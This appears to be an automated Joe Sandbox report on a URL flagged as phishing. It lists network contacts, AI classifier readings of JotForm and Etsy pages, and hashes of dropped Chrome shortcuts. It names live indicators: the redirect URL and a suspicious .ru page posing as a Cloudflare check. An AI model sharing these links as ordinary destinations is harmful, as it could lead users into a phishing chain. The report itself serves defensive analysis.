                                                                                                                                                                151.101.192.84
                                                                                                                                                                prod.pinterest.global.map.fastly.netUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                104.17.25.14
                                                                                                                                                                cdnjs.cloudflare.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                104.22.72.81
                                                                                                                                                                cdn02.jotfor.msUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                142.250.186.46
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                151.101.129.224
                                                                                                                                                                unknownUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                216.58.206.70
                                                                                                                                                                ad.doubleclick.netUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                54.171.184.136
                                                                                                                                                                alb-ireland-ext-ingress-group-474278744.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                3.69.4.67
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                18.172.103.101
                                                                                                                                                                dg2iu7dxxehbo.cloudfront.netUnited States
                                                                                                                                                                3MIT-GATEWAYSUSfalse
                                                                                                                                                                151.101.64.84
                                                                                                                                                                dualstack.pinterest.map.fastly.netUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                142.250.185.200
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                52.213.1.0
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                172.64.151.101
                                                                                                                                                                dsum-sec.casalemedia.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                63.34.235.58
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                69.173.144.138
                                                                                                                                                                unknownUnited States
                                                                                                                                                                26667RUBICONPROJECTUSfalse
                                                                                                                                                                18.66.27.65
                                                                                                                                                                d2pbcviywxotf2.cloudfront.netUnited States
                                                                                                                                                                3MIT-GATEWAYSUSfalse
                                                                                                                                                                172.67.143.206
                                                                                                                                                                pixel.streetmetrics.ioUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                172.64.147.18
                                                                                                                                                                unknownUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                208.91.199.114
                                                                                                                                                                surzofilmography.comUnited States
                                                                                                                                                                394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                                142.250.184.206
                                                                                                                                                                analytics.google.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                2.17.100.224
                                                                                                                                                                unknownEuropean Union
                                                                                                                                                                4230CLAROSABRfalse
                                                                                                                                                                104.22.73.81
                                                                                                                                                                unknownUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                23.206.208.183
                                                                                                                                                                unknownUnited States
                                                                                                                                                                16625AKAMAI-ASUSfalse
                                                                                                                                                                151.101.1.224
                                                                                                                                                                etsy.map.fastly.netUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                216.58.212.132
                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                23.213.161.216
                                                                                                                                                                unknownUnited States
                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                35.201.118.58
                                                                                                                                                                go.lb.jotform.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.185.138
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                172.67.7.107
                                                                                                                                                                cdn01.jotfor.msUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                35.186.224.24
                                                                                                                                                                edge-web.dual-gslb.spotify.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.185.136
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                151.101.2.137
                                                                                                                                                                code.jquery.comUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                150.171.27.10
                                                                                                                                                                ax-0001.ax-msedge.netUnited States
                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                2.19.126.84
                                                                                                                                                                unknownEuropean Union
                                                                                                                                                                16625AKAMAI-ASUSfalse
                                                                                                                                                                142.250.185.170
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.181.227
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                18.245.46.94
                                                                                                                                                                telemetry.transcend.ioUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                104.19.229.21
                                                                                                                                                                api.hcaptcha.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                13.227.219.93
                                                                                                                                                                lantern.roeyecdn.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                3.122.38.117
                                                                                                                                                                tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                188.114.96.3
                                                                                                                                                                w4.ischievou8.ruEuropean Union
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                142.250.186.164
                                                                                                                                                                unknownUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                142.250.186.166
                                                                                                                                                                dart.l.doubleclick.netUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                35.244.142.80
                                                                                                                                                                cdn.pdst.fmUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                151.101.2.132
                                                                                                                                                                unknownUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                157.240.251.35
                                                                                                                                                                star-mini.c10r.facebook.comUnited States
                                                                                                                                                                32934FACEBOOKUSfalse
                                                                                                                                                                54.195.83.249
                                                                                                                                                                lantern.roeye.comUnited States
                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                IP
                                                                                                                                                                192.168.2.5
                                                                                                                                                                192.168.2.16
                                                                                                                                                                192.168.2.10
                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1530334
                                                                                                                                                                Start date and time:2024-10-10 00:32:04 +02:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                Sample URL:https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052
                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                Number of analysed new started processes analysed:15
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • EGA enabled
                                                                                                                                                                Analysis Mode:stream
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal52.phis.win@38/155@210/569
                                                                                                                                                                • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 216.58.212.163, 142.250.186.46, 74.125.133.84, 34.104.35.123, 142.250.185.138, 142.250.184.234, 142.250.186.170, 142.250.186.74, 216.58.206.74, 142.250.181.234, 142.250.74.202, 142.250.186.106, 172.217.16.202, 142.250.186.138, 142.250.186.42, 142.250.184.202, 172.217.18.10, 142.250.185.234, 172.217.23.106, 142.250.185.74
                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                • VT rate limit hit for: https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052
                                                                                                                                                                InputOutput
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":[],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Submit",
                                                                                                                                                                "text_input_field_labels":["I am human"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please verify that you are human* I am human Submit hCaptcha Privacy - Terms",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":[],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Submit",
                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please verify that you are human* I am human Submit",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":[],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Skip",
                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please verify your email address. EN",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "phishing_score":2,
                                                                                                                                                                "brands":"unknown",
                                                                                                                                                                "legit_domain":"jotform.com",
                                                                                                                                                                "classification":"known",
                                                                                                                                                                "reasons":["The URL 'form.jotform.com' is a subdomain of 'jotform.com',
                                                                                                                                                                 which is a known and legitimate domain for JotForm,
                                                                                                                                                                 a popular online form builder.",
                                                                                                                                                                "The brand is identified as 'JotForm' from the URL,
                                                                                                                                                                 which is a known brand in the online form creation space.",
                                                                                                                                                                "The presence of the input field 'I am human' is typical for forms to prevent automated submissions and is not inherently suspicious.",
                                                                                                                                                                "There are no suspicious elements in the URL such as misspellings,
                                                                                                                                                                 extra characters,
                                                                                                                                                                 or unusual domain extensions."],
                                                                                                                                                                "brand_matches":[],
                                                                                                                                                                "url_match":true,
                                                                                                                                                                "brand_input":"unknown",
                                                                                                                                                                "input_fields":"I am human"}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "phishing_score":1,
                                                                                                                                                                "brands":"unknown",
                                                                                                                                                                "legit_domain":"jotform.com",
                                                                                                                                                                "classification":"known",
                                                                                                                                                                "reasons":["The URL 'form.jotform.com' is a subdomain of 'jotform.com',
                                                                                                                                                                 which is a known and legitimate domain associated with the JotForm brand.",
                                                                                                                                                                "JotForm is a well-known online form builder service,
                                                                                                                                                                 and the URL structure is consistent with their service offerings.",
                                                                                                                                                                "There are no suspicious elements in the URL such as misspellings,
                                                                                                                                                                 extra characters,
                                                                                                                                                                 or unusual domain extensions.",
                                                                                                                                                                "The brand 'unknown' is not specified,
                                                                                                                                                                 but the URL itself is directly associated with JotForm,
                                                                                                                                                                 a known service provider."],
                                                                                                                                                                "brand_matches":[],
                                                                                                                                                                "url_match":true,
                                                                                                                                                                "brand_input":"unknown",
                                                                                                                                                                "input_fields":"unknown"}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":[],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Skip",
                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please click on the entity present in the sample image.",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Globi"],
                                                                                                                                                                "contains_trigger_text":true,
                                                                                                                                                                "trigger_text":"Click here to view document",
                                                                                                                                                                "prominent_button_name":"Skip",
                                                                                                                                                                "text_input_field_labels":["EN"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please click on the entity present in the sample image.",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":[],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Next",
                                                                                                                                                                "text_input_field_labels":["EN"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please click on the entity present in the sample image.",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":[],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Submit",
                                                                                                                                                                "text_input_field_labels":[],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please verify that you are human* I am human Submit",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "Status":"Unavailable"}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":[],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":true,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Please verify that you are human* I am human Please wait... Waiting for api.hcaptcha.com...",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://form.jotform.com/242704649007052 Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "phishing_score":2,
                                                                                                                                                                "brands":"unknown",
                                                                                                                                                                "legit_domain":"jotform.com",
                                                                                                                                                                "classification":"known",
                                                                                                                                                                "reasons":["The URL 'form.jotform.com' is a subdomain of 'jotform.com',
                                                                                                                                                                 which is a known and legitimate domain associated with the JotForm brand.",
                                                                                                                                                                "JotForm is a well-known online form builder service,
                                                                                                                                                                 and the URL structure is consistent with their service offerings.",
                                                                                                                                                                "There are no suspicious elements in the URL such as misspellings,
                                                                                                                                                                 extra characters,
                                                                                                                                                                 or unusual domain extensions.",
                                                                                                                                                                "The brand 'unknown' is not specified,
                                                                                                                                                                 but the URL itself is associated with a known service provider."],
                                                                                                                                                                "brand_matches":[],
                                                                                                                                                                "url_match":true,
                                                                                                                                                                "brand_input":"unknown",
                                                                                                                                                                "input_fields":"unknown"}
                                                                                                                                                                URL: https://w4.ischievou8.ru/dr2/ Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Verifying... Conducting security checks on your browser for protection.",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://w4.ischievou8.ru/dr2/ Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Cloudflare"],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"unknown",
                                                                                                                                                                "text_input_field_labels":"unknown",
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Success!",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://www.etsy.com/ Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Etsy"],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Shop now",
                                                                                                                                                                "text_input_field_labels":["Clothing",
                                                                                                                                                                "Pendant necklaces",
                                                                                                                                                                "Wall decor",
                                                                                                                                                                "Digital drawings and illustrations",
                                                                                                                                                                "Digital prints",
                                                                                                                                                                "Women's t-shirts"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Holiday deals are here NOW! Up to 40% off on seasonal pieces from small shops. Shop now Original Halloween essentials Personalized trick or treat bags Shop now Last-minute Halloween Creepy and creative printables Shop now Featured categories Clothing Pendant necklaces Wall decor Digital drawings and illustrations Digital prints Women's t-shirts",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://www.etsy.com/ Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Etsy"],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Shop now",
                                                                                                                                                                "text_input_field_labels":["Clothing",
                                                                                                                                                                "Pendant necklaces",
                                                                                                                                                                "Wall decor",
                                                                                                                                                                "Digital drawings and illustrations",
                                                                                                                                                                "Digital prints",
                                                                                                                                                                "Women's t-shirts"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Holiday deals are here NOW! Up to 40% off on seasonal pieces from small shops. Shop now  Participating shops only. Terms apply. Original Halloween essentials Personalized trick or treat bags Shop now  Last-minute Halloween Creepy and creative printables Shop now  Featured categories Clothing Pendant necklaces Wall decor Digital drawings and illustrations Digital prints Women's t-shirts Waiting for j9yj2su57ulgndrtcc99d3jp3bkraj1cqpaonxdi15db2lqnxjsvziw.xyle...",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://www.etsy.com/ Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Etsy"],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Shop now",
                                                                                                                                                                "text_input_field_labels":["Clothing",
                                                                                                                                                                "Pendant necklaces",
                                                                                                                                                                "Wall decor",
                                                                                                                                                                "Digital drawings and illustrations",
                                                                                                                                                                "Digital prints",
                                                                                                                                                                "Women's t-shirts"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Holiday deals are here NOW! Up to 40% off on seasonal pieces from small shops. Shop now  Participating shops only. Terms apply. Original Halloween essentials Personalized trick or treat bags Shop now  Last-minute Halloween Creepy and creative printables Shop now  Featured categories Clothing Pendant necklaces Wall decor Digital drawings and illustrations Digital prints Women's t-shirts",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://www.etsy.com/ Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Etsy"],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Shop now",
                                                                                                                                                                "text_input_field_labels":["Clothing",
                                                                                                                                                                "Pendant necklaces",
                                                                                                                                                                "Wall decor",
                                                                                                                                                                "Digital drawings and illustrations",
                                                                                                                                                                "Digital prints",
                                                                                                                                                                "Women's t-shirts"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Holiday deals are here NOW! Up to 40% off on seasonal pieces from small shops. Shop now Original Halloween essentials Personalized trick or treat bags Shop now Last-minute Halloween Creepy and creative printables Shop now Featured categories Clothing Pendant necklaces Wall decor Digital drawings and illustrations Digital prints Women's t-shirts https://www.etsy.com/search?explicit=1&q=pendant+necklaces&ref=hp_to...",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                URL: https://www.etsy.com/ Model: jbxai
                                                                                                                                                                {
                                                                                                                                                                "brand":["Etsy"],
                                                                                                                                                                "contains_trigger_text":false,
                                                                                                                                                                "trigger_text":"",
                                                                                                                                                                "prominent_button_name":"Shop now",
                                                                                                                                                                "text_input_field_labels":["Clothing",
                                                                                                                                                                "Pendant necklaces",
                                                                                                                                                                "Wall decor",
                                                                                                                                                                "Digital drawings and illustrations",
                                                                                                                                                                "Digital prints",
                                                                                                                                                                "Women's t-shirts"],
                                                                                                                                                                "pdf_icon_visible":false,
                                                                                                                                                                "has_visible_captcha":false,
                                                                                                                                                                "has_urgent_text":false,
                                                                                                                                                                "text":"Holiday deals are here NOW! Up to 40% off on seasonal pieces from small shops. Shop now  Participating shops only. Terms apply. Original Halloween essentials Personalized trick or treat bags Shop now  Last-minute Halloween Creepy and creative printables Shop now  Featured categories Clothing Pendant necklaces Wall decor Digital drawings and illustrations Digital prints Women's t-shirts https://www.etsy.com/search?explicit=1&q=women%27s+t-shirts&ref=hp_t",
                                                                                                                                                                "has_visible_qrcode":false}
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 9 21:32:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2673
                                                                                                                                                                Entropy (8bit):3.9896529196896195
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:93FC00F5905694CC5DF1B214723A6287
                                                                                                                                                                SHA1:9FDB8E3B41FB04F70D2AFA7BB35A1628C8D5887B
                                                                                                                                                                SHA-256:4A1FF4E5C20F68FC2D77E15FE0CC77AD016C47742361FFF74BA291A58C34B6B0
                                                                                                                                                                SHA-512:FC8D24B97C49C5F84FC5EA257351CFD04487AAB73D3429E392D0EA4DC3033511D3CC3992ADF7296E2B56DA2F4AA959201B4C4EFEFA32D62719BAA81804F40B82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:L..................F.@.. ...$+.,.......(....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IIY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VIY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VIY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VIY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VIY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 9 21:32:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2675
                                                                                                                                                                Entropy (8bit):4.006567865674834
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:962449DE8C26A8C10D0DAC7D62B34799
                                                                                                                                                                SHA1:C20B19F0FB68A11A017806882B30F999BD2BD457
                                                                                                                                                                SHA-256:3230B4472401504BBDB9104DAA7319D7A2F023B2D37CE61426CCD4BEF3183AE1
                                                                                                                                                                SHA-512:D19202354AF9088503A18531D10630D1D9809EEB7BAE6DC181726A73290DB382AD0A23AD80695E570F8D9A4698A17317F2A7212E60B86E7A02C842F95531F4CC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:L..................F.@.. ...$+.,....k..(....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IIY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VIY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VIY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VIY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VIY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2689
                                                                                                                                                                Entropy (8bit):4.012924476294096
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:999F706B82CE735865966B2075EE908A
                                                                                                                                                                SHA1:A740A513756C4EB8071A3F31E8BFA40544FF8A6F
                                                                                                                                                                SHA-256:A8EEECD6DB8E9360012BFF6B6BA3C89160DB5A8523954645DDF26DAA9D51279E
                                                                                                                                                                SHA-512:2EE7B33231F6BE5C3F07CDEF0A87884C3B51371176C75A831868824A4BFD5AF04EE53677A77115341A5B8C9F17184867A2161FE15DB39BA6952F6682FDD5DFFA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
